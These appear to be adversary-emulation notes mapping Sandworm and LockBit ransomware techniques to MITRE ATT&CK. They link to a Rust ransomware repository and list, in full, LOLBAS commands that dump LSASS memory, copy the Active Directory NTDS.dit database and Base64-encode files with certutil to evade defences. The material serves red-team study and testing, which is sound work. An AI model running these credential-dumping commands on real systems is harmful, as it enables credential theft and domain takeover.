[T1486: Data Encrypted for Impact](https://cmndcntrl.notion.site/T1486-Data-Encrypted-for-Impact-2008f81ca68847258758013d8ffeaf85)

[T1490: Inhibit System Recovery](https://cmndcntrl.notion.site/T1490-Inhibit-System-Recovery-bc900c7c69cc401093146326c62eb71a)

[T1027: Obfuscated Files or Information](https://cmndcntrl.notion.site/T1027-Obfuscated-Files-or-Information-0fcf4f9d405e41ef98e125dc141da8e0)

[T1047: Windows Management Instrumentation](https://cmndcntrl.notion.site/T1047-Windows-Management-Instrumentation-ee220ee69d794e778c3d0599a50831f2)

[T1036: Masquerading](https://cmndcntrl.notion.site/T1036-Masquerading-a30625fd63304a1fb0b6a1f8fd77b475)

[T1059: Command & Scripting Interpreter](https://cmndcntrl.notion.site/T1059-Command-Scripting-Interpreter-34523300a9e448b29d1887e3db8103f3)

[T1562: Impair Defenses](https://cmndcntrl.notion.site/T1562-Impair-Defenses-271ff0d0adb249919674494be227c272)

[T1112: Modify Registry](https://cmndcntrl.notion.site/T1112-Modify-Registry-14dfca4a8a01486da3433118909548d2)

[T1204: User Execution](https://cmndcntrl.notion.site/T1204-User-Execution-840a2e91b9b542d8b3813f4ab06bb66c)

[T1055: Process Injection](https://cmndcntrl.notion.site/T1055-Process-Injection-be87c8ba590947c0bf748826834f9a0d)

Here's a table summarizing the key MITRE ATT&CK TTPs for the Sandworm Team and LockBit, associated with ransomware attacks:

RansomwareSim

Pre-ransomware activities

Prior to deploying ransomware

https://github.com/cdong1012/Rust-Ransomware

Sandworm Team TTPs

| Technique | Source / Notes | Commands |
| --- | --- | --- |
| Spearphishing Attachment (T1566.001) | https://filesec.io/# | (linked page) |
| Drive-by Compromise (T1189) | (linked page) | (linked page) |
| Command and Scripting Interpreter (T1059) | Prestige can use PowerShell for payload execution on targeted systems | [T1059: Command & Scripting Interpreter](https://cmndcntrl.notion.site/T1059-Command-Scripting-Interpreter-34523300a9e448b29d1887e3db8103f3) |
| (linked page) | https://lolbas-project.github.io/lolbas/Binaries/Schtasks/, https://lolbas-project.github.io/lolbas/Binaries/At/ | (linked page) |
| Exploitation for Privilege Escalation (T1068) | | |
| Obfuscated Files or Information (T1027) | https://lolbas-project.github.io/lolbas/Binaries/Certutil/ | Certutil entry below |
| Rootkit (T1014) | | |
| Credential Dumping (T1003) | https://lolbas-project.github.io/#t1003 | OS Credential Dumping entries below |
| System Network Configuration Discovery (T1016) | | |
| Pass the Hash (T1550.002) | | |
| Data Encrypted for Impact (T1486) | https://attack.mitre.org/techniques/T1486/, https://attack.mitre.org/software/S1058/, https://bazaar.abuse.ch/browse.php?search=tag%3Aprestige | Prestige has leveraged the CryptoPP C++ library to encrypt files on target systems using AES and appended filenames with .enc.[1] |

Obfuscated Files or Information (T1027): Certutil

Command to encode a file using Base64:

```
certutil -encode inputFileName encodedOutputFileName
```

Use case: Encode files to evade defensive measures. Privileges required: User. OS: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11. MITRE ATT&CK®: T1027: Obfuscated Files or Information.

Credential Dumping (T1003): LOLBAS entries

diskshadow.exe, driven by a script file:

```
diskshadow.exe /s c:\test\diskshadow.txt
```

rdrleakdiag.exe: dump a process by PID and create a dump file (creates files called minidump_<PID>.dmp and results_<PID>.hlk).

```
rdrleakdiag.exe /p 940 /o c:\evil /fullmemdmp /wait 1
```

Use case: Dump process by PID. Privileges required: User. OS: Windows. MITRE ATT&CK®: T1003: OS Credential Dumping.

rdrleakdiag.exe: dump the LSASS process by PID and create a dump file (creates files called minidump_<PID>.dmp and results_<PID>.hlk).

```
rdrleakdiag.exe /p 832 /o c:\evil /fullmemdmp /wait 1
```

Use case: Dump LSASS process. Privileges required: Administrator. OS: Windows. MITRE ATT&CK®: T1003.001: LSASS Memory.

rdrleakdiag.exe: after dumping a process using /wait 1, subsequent dumps must use /snap (creates files called minidump_<PID>.dmp and results_<PID>.hlk).

```
rdrleakdiag.exe /p 832 /o c:\evil /fullmemdmp /snap
```

Use case: Dump LSASS process multiple times. Privileges required: Administrator. OS: Windows. MITRE ATT&CK®: T1003.001: LSASS Memory.

ntdsutil.exe: create a full IFM (Install From Media) set under c:\, which includes a copy of the NTDS database.

```
ntdsutil.exe "ac i ntds" "ifm" "create full c:\" q q
```

dump64.exe: create a memory dump of the LSASS process.

```
dump64.exe <pid> out.dmp
```

Use case: Create memory dump and parse it offline to retrieve credentials. Privileges required: Administrator. OS: Windows 10, Windows 11. MITRE ATT&CK®: T1003.001: LSASS Memory.

dsdbutil.exe supports VSS snapshot creation.

```
dsdbutil.exe "activate instance ntds" "snapshot" "create" "quit" "quit"
```

Use case: Snapshotting of the Active Directory NTDS.dit database. Privileges required: Administrator. OS: Windows Server 2012, Windows Server 2016, Windows Server 2019. MITRE ATT&CK®: T1003.003: NTDS.

dsdbutil.exe: mount the snapshot by its GUID.

```
dsdbutil.exe "activate instance ntds" "snapshot" "mount {GUID}" "quit" "quit"
```

Use case: Mount the snapshot to access ntds.dit with `copy c:\[Snap Volume]\windows\ntds\ntds.dit c:\users\administrator\desktop\ntds.dit.bak`. Privileges required: Administrator. OS: Windows Server 2012, Windows Server 2016, Windows Server 2019. MITRE ATT&CK®: T1003.003: NTDS.

dsdbutil.exe: delete the snapshot mounted by GUID.

```
dsdbutil.exe "activate instance ntds" "snapshot" "delete {GUID}" "quit" "quit"
```

Use case: Delete the snapshot. Privileges required: Administrator. OS: Windows Server 2012, Windows Server 2016, Windows Server 2019. MITRE ATT&CK®: T1003.003: NTDS.

dsdbutil.exe: mount by snapshot identifier.

```
dsdbutil.exe "activate instance ntds" "snapshot" "create" "list all" "mount 1" "quit" "quit"
```

Use case: Mount snapshot identifier 1 and access it with `copy c:\[Snap Volume]\windows\ntds\ntds.dit c:\users\administrator\desktop\ntds.dit.bak`. Privileges required: Administrator. OS: Windows Server 2012, Windows Server 2016, Windows Server 2019. MITRE ATT&CK®: T1003.003: NTDS.

dsdbutil.exe: delete the snapshot by identifier.

```
dsdbutil.exe "activate instance ntds" "snapshot" "list all" "delete 1" "quit" "quit"
```

Use case: Delete the snapshot. Privileges required: Administrator. OS: Windows Server 2012, Windows Server 2016, Windows Server 2019. MITRE ATT&CK®: T1003.003: NTDS.

createdump.exe: dump a process by PID and create a minidump file. If "-f dump.dmp" is not specified, the file is created as '%TEMP%\dump.%p.dmp', where %p is the PID of the target process.

```
createdump.exe -n -f dump.dmp [PID]
```

Use case: Dump process memory contents using PID. Privileges required: SYSTEM. OS: Windows 10, Windows 11. MITRE ATT&CK®: T1003: OS Credential Dumping.

adplus.exe: create a memory dump of the lsass process.

```
adplus.exe -hang -pn lsass.exe -o c:\users\mr.d0x\output\folder -quiet
```

Use case: Create memory dump and parse it offline. Privileges required: SYSTEM. OS: All Windows. MITRE ATT&CK®: T1003.001: LSASS Memory.

adplus.exe: dump process memory using an adplus config file (see the Resources section for a sample file).

```
adplus.exe -c config-adplus.xml
```

Use case: Run commands under a trusted Microsoft-signed binary. Privileges required: SYSTEM. OS: All Windows. MITRE ATT&CK®: T1003.001: LSASS Memory.

rundll32 with comsvcs.dll: calls the MiniDump exported function of comsvcs.dll, which in turn calls MiniDumpWriteDump.

```
rundll32 C:\windows\system32\comsvcs.dll MiniDump [LSASS_PID] dump.bin full
```

Use case: Dump lsass.exe process memory to retrieve credentials. Privileges required: SYSTEM. OS: Windows 10, Windows 11. MITRE ATT&CK®: T1003.001: LSASS Memory.

Cybersecurity Incident & Vulnerability Response Playbooks